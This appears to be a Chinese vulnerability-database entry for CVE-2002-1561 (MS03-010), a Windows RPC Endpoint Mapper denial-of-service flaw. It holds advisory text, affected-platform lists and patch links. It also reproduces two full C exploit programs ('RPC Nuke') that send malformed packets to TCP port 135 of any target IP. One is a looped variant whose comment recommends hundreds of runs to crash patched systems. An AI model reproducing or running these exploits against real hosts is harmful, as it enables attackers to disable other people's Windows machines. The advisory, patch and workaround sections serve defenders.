CVE-2002-1561
CVSS5.0
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-10 15:14:53
NMCOES    

[原文]The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.


[CNNVD]Microsoft Windows 2000/XP RPC服务远程拒绝服务攻击漏洞(MS03-010)(CNNVD-200304-002)

        
        Microsoft Windows 2000/XP是微软公司开发的WINDOWS操作系统。
        Microsoft Windows 2000/XP的RPC服务存在漏洞,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        漏洞存在于Windows系统的DCE-RPC堆栈实现中,远程攻击者可以连接TCP 135端口,发送畸形数据,可导致关闭RPC服务,关闭RPC服务可以引起系统停止对新的RPC请求进行响应,产生拒绝服务。由于众多服务都依赖于RPC服务, 这可能使系统变得不稳定, 很多正常操作无法进行. 例如, Word中将无法使用拷贝/粘贴功能. 根据系统安装的补丁情况, 可能导致Windows XP系统重新起动.
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_2000_terminal_services::sp3
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp6a:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6a
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:59Microsoft Windows RPC Denial of Service
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1561
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1561
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-002
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/261537
(UNKNOWN)  CERT-VN  VU#261537
http://www.securityfocus.com/bid/6005
(VENDOR_ADVISORY)  BID  6005
http://www.securityfocus.com/archive/1/296114/2002-10-14/2002-10-20/0
(VENDOR_ADVISORY)  BUGTRAQ  20021018 [Immunity, Inc.]Vulnerability: RPC Service DoS (port 135/tcp) onWindows 2000 SP3
http://www.microsoft.com/technet/security/bulletin/MS03-010.asp
(UNKNOWN)  MS  MS03-010

- 漏洞信息

Microsoft Windows 2000/XP RPC服务远程拒绝服务攻击漏洞(MS03-010)
中危 其他
2003-04-02 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows 2000/XP是微软公司开发的WINDOWS操作系统。
        Microsoft Windows 2000/XP的RPC服务存在漏洞,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        漏洞存在于Windows系统的DCE-RPC堆栈实现中,远程攻击者可以连接TCP 135端口,发送畸形数据,可导致关闭RPC服务,关闭RPC服务可以引起系统停止对新的RPC请求进行响应,产生拒绝服务。由于众多服务都依赖于RPC服务, 这可能使系统变得不稳定, 很多正常操作无法进行. 例如, Word中将无法使用拷贝/粘贴功能. 根据系统安装的补丁情况, 可能导致Windows XP系统重新起动.
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用防火墙或Windows系统自带的TCP/IP过滤机制对TCP 135端口进行限制,限制外部不可信主机的连接。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-010)以及相应补丁:
        MS03-010:Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-010.asp

        补丁下载:
         + Microsoft Windows 2000
         o All except Japanese NEC
        
        http://microsoft.com/downloads/details.aspx?FamilyId=BD55EB38-A5DE-4810-90F7-097C5B4B9919&displaylang=en

         o Japanese NEC
        
        http://microsoft.com/downloads/details.aspx?FamilyId=3F7DC0DA-A684-43A8-B2E3-1EEDEEDC822C&displaylang=ja

         + Windows XP
         o 32-bit Edition
        
        http://microsoft.com/downloads/details.aspx?FamilyId=94213569-3258-4439-9AE7-5D86813B4D9E&displaylang=en

         o 64-bit edition
        
        http://microsoft.com/downloads/details.aspx?FamilyId=E3FB88CF-FA48-4426-A4F8-D18D8D4D2295&displaylang=en

- 漏洞信息 (21951)

Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) (EDBID:21951)
windows dos
2002-10-22 Verified
0 lion
N/A [点击下载]
source: http://www.securityfocus.com/bid/6005/info

The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.

This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.

It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.

A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. 

/*
************************************************************************
* MS WIN RPC DoS CODE FROM SPIKE v2.7
* 
* Compile it use:
* cl winnuke.c
*
* Usage:
* winnuke targetip   
*
* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com
* 2002/10/22
************************************************************************
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char sendcode1[] = 
	"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
	"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
	"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
	"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
	"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
	"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
	"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

char sendcode2[] = 
	"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

char sendcode3[] = 
	"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

char sendcode4[] = 
	"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d" 
	"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
	"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
	"\x50\x10\x01\x00\x00\x00\x02\x00";

char sendcode5[] = 
	"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
	"\x80\xf9\x00\x00\x00\x00\x02\x00";

char sendcode6[] = 
	"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
	"\xb0\xe2\x00\x00\x00\x00\x02\x00";

char sendcode7[] = 
	"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
	"\x60\x15\x00\x00\x00\x00\x02\x00";

char sendcode8[] = 
	"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent 		*pTarget;
	struct sockaddr_in 	sock;
	char *targetip;
	int port,bufsize;
	SOCKET s;
	char buffer[20480];

	printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================\r\n");
	printf("================= By Lion, Welcome to http://www.cnhonker.com =================\r\n\n");

	if (argc < 2)
	{
		printf("Usage:\r\n");
		printf("    %s <TargetIP> [TargetPort]\r\n", argv[0]);
		printf("Example:\r\n");
		printf("    %s 192.168.0.1\r\n", argv[0]);
		printf("    %s 192.168.0.1 135\r\n", argv[0]);
		printf("PS:\r\n");
		printf("    If target is XP, try 2 times.\r\n");
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	targetip = argv[1];
	port = 135;
	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 512;
	if (argc >= 4) bufsize = atoi(argv[3]);

	s = socket(AF_INET, SOCK_STREAM, 0);
	if(s==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(targetip)) == NULL)
	{
		printf("Resolve of %s failed, please try again.\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Packets...\n");
	if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
	{
		printf("Error sending nuke Packets\r\n");
		closesocket(s);
		exit(1);
	}

	memset(&buffer, '\x41', 240);
	send(s, buffer, 240, 0);

	send(s, sendcode2, sizeof(sendcode2)-1, 0);
	memset(&buffer, '\x42', 5000);
	send(s, buffer, 5000, 0);

	send(s, sendcode3, sizeof(sendcode3)-1, 0);
	memset(&buffer, '\x43', 512);
	send(s, buffer, 512, 0);
	
	send(s, sendcode4, sizeof(sendcode4)-1, 0);
//	memset(&buffer, '\x44', 20480);
//	send(s, buffer, 20480, 0);

//	/*
	memset(&buffer, '\x44', 5000);
	send(s, buffer, 5000, 0);

	send(s, sendcode5, sizeof(sendcode5)-1, 0);
	memset(&buffer, '\x45', 5000);
	send(s, buffer, 5000, 0);

	send(s, sendcode6, sizeof(sendcode6)-1, 0);
	memset(&buffer, '\x46', 5000);
	send(s, buffer, 5000, 0);

	send(s, sendcode7, sizeof(sendcode7)-1, 0);
	memset(&buffer, '\x47', 5000);
	send(s, buffer, 5000, 0);

	send(s, sendcode8, sizeof(sendcode8)-1, 0);
	memset(&buffer, '\x48', 5000);
	send(s, buffer, 5000, 0);
	
//	*/ 
	printf("Nuked! \r\nIf target is XP, try a again! :)\r\n");
	closesocket(s);
	WSACleanup();
	return 0;
}		

- 漏洞信息 (21952)

Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) (EDBID:21952)
windows dos
2002-10-22 Verified
0 Trancer
N/A [点击下载]
source: http://www.securityfocus.com/bid/6005/info
 
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
 
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
 
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
 
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. 

/*
* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ http://www.cnhonker.com
* Upgraded By Trancer @ http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this
vulnerability with an offical M$ update,
* an attacker can still DoS that system if he activate this exploit a lot
of times, fast.
* So I've upgraded the exploit by looping it and letting you control the
times you want to nuke a system
* (with a patched 2000\XP 250-400 times is recommended).
*
* That's it. enjoy :-)
\*

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char sendcode1[] =
  "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
  "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
  "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
  "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
  "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
  "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
  "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

char sendcode2[] =
  "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

char sendcode3[] =
  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

char sendcode4[] =
  "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
  "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
  "\x50\x10\x01\x00\x00\x00\x02\x00";

char sendcode5[] =
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
  "\x80\xf9\x00\x00\x00\x00\x02\x00";

char sendcode6[] =
  "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
  "\xb0\xe2\x00\x00\x00\x00\x02\x00";

char sendcode7[] =
  "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
  "\x60\x15\x00\x00\x00\x00\x02\x00";

char sendcode8[] =
  "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

int main(int argc, char *argv[])
{
  WSADATA wsaData;
  WORD wVersionRequested;
  struct hostent *pTarget;
  struct sockaddr_in sock;
  char *targetip;
  int port,bufsize,times,i;
  SOCKET s;
  char buffer[20480];

  printf("======================= Windows NT Multi RPC Nuke V0.12
======================\r\n");
  printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
===============\r\n");
  printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
==============\r\n\n");

  if (argc < 2)
  {
    printf("Usage:\r\n");
    printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
    printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]);
    printf("PS:\r\n");
    printf(" If target is XP, try 2 times.\r\n");
    exit(1);
  }

  wVersionRequested = MAKEWORD(1, 1);
  if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

  targetip = argv[1];
  port = 135;
  if (argc >= 3) port = atoi(argv[2]);
  bufsize = 512;
  if (argc >= 4) bufsize = atoi(argv[3]);
  times = 1;
  if (argc >= 5) times = atoi(argv[4]);

  for (i = 0; i < times; i = i + 1)
  {

    s = socket(AF_INET, SOCK_STREAM, 0);
    if(s==INVALID_SOCKET)
    {
      printf("Socket error!\r\n");
      exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(targetip)) == NULL)
    {
      printf("Resolve of %s failed, please try again.\n", argv[1]);
      exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
    {
      printf("Couldn't connect to host.\n");
      exit(1);
    }

    printf("Connected!...\n");
    printf("Sending Packets...\n");
    if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
    {
      printf("Error sending nuke Packets\r\n");
      closesocket(s);
      exit(1);
    }

    memset(&buffer, '\x41', 240);
    send(s, buffer, 240, 0);

    send(s, sendcode2, sizeof(sendcode2)-1, 0);
    memset(&buffer, '\x42', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode3, sizeof(sendcode3)-1, 0);
    memset(&buffer, '\x43', 512);
    send(s, buffer, 512, 0);

    send(s, sendcode4, sizeof(sendcode4)-1, 0);
    memset(&buffer, '\x44', 20480);
    send(s, buffer, 20480, 0);

    memset(&buffer, '\x44', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode5, sizeof(sendcode5)-1, 0);
    memset(&buffer, '\x45', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode6, sizeof(sendcode6)-1, 0);
    memset(&buffer, '\x46', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode7, sizeof(sendcode7)-1, 0);
    memset(&buffer, '\x47', 5000);
    send(s, buffer, 5000, 0);

    send(s, sendcode8, sizeof(sendcode8)-1, 0);
    memset(&buffer, '\x48', 5000);
    send(s, buffer, 5000, 0);
    i = i + 1;
  }

  if (times < 2)
  {
    printf("Nuked! If target is XP, try a again! :)\r\n");
  }
  else
  {
    printf("%s was nuked %s times\r\n", argv[1], argv[4]);
  }

  closesocket(s);
  WSACleanup();
  return 0;
}
		

- 漏洞信息 (21953)

Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) (EDBID:21953)
windows dos
2002-10-18 Verified
0 Rapid7
N/A [点击下载]
source: http://www.securityfocus.com/bid/6005/info
  
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
  
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
  
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
  
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. 

http://www.exploit-db.com/sploits/21953.tar.gz		

- 漏洞信息 (21954)

Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) (EDBID:21954)
windows dos
2002-10-18 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/6005/info
   
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
   
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
   
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
   
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.

http://www.exploit-db.com/sploits/21954.rar		

- 漏洞信息

13414
Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Workaround, Patch / RCS
Vendor Verified

- 漏洞描述

- 时间线

2002-10-18 Unknow
Unknow Unknow

- 解决方案

Microsoft has released a patch to address this vulnerability. Additionally, it is possible to temporarily work around the flaw by implementing the following workaround: disable remote access to TCP port 135.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows RPC Service Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 6005
Yes No
2002-10-18 12:00:00 2009-07-11 06:06:00
Discovery of this vulnerability is credited to Dave Aitel <dave@immunitysec.com>.

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.

This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.

It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.

A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.

- 漏洞利用

Dave Aitel has made a proof of concept exploit available at http://www.immunitysec.com/vulnerabilities/Immunity_svchostkill.tar.gz

The following exploits are available:

- 解决方案

Microsoft has issued fixes for Windows 2000 and XP. They state that they will not be releasing fixes for Windows NT 4.0.

The Windows 2000 patches can be applied to systems that already have Service Pack 2 or 3. The Windows XP patches can be applied to Gold and Service Pack 1 systems.

The patches provided in MS03-010 may cause problems for users of the COM+ packages in an IIS environment. Specifically, ASP transactions with COM+ may have some issues. Affected users are advised to contact PSS and ask for 814119.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP1

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Terminal Services SP2

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Terminal Services

Microsoft Windows 2000 Professional

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows 2000 Terminal Services SP3

Microsoft Windows 2000 Professional SP1

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition

Microsoft Windows 2000 Server SP1

Microsoft Windows XP Professional

Microsoft Windows 2000 Terminal Services SP1

Microsoft Windows XP Professional SP1

Microsoft Windows 2000 Advanced Server

Microsoft Windows 2000 Server

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站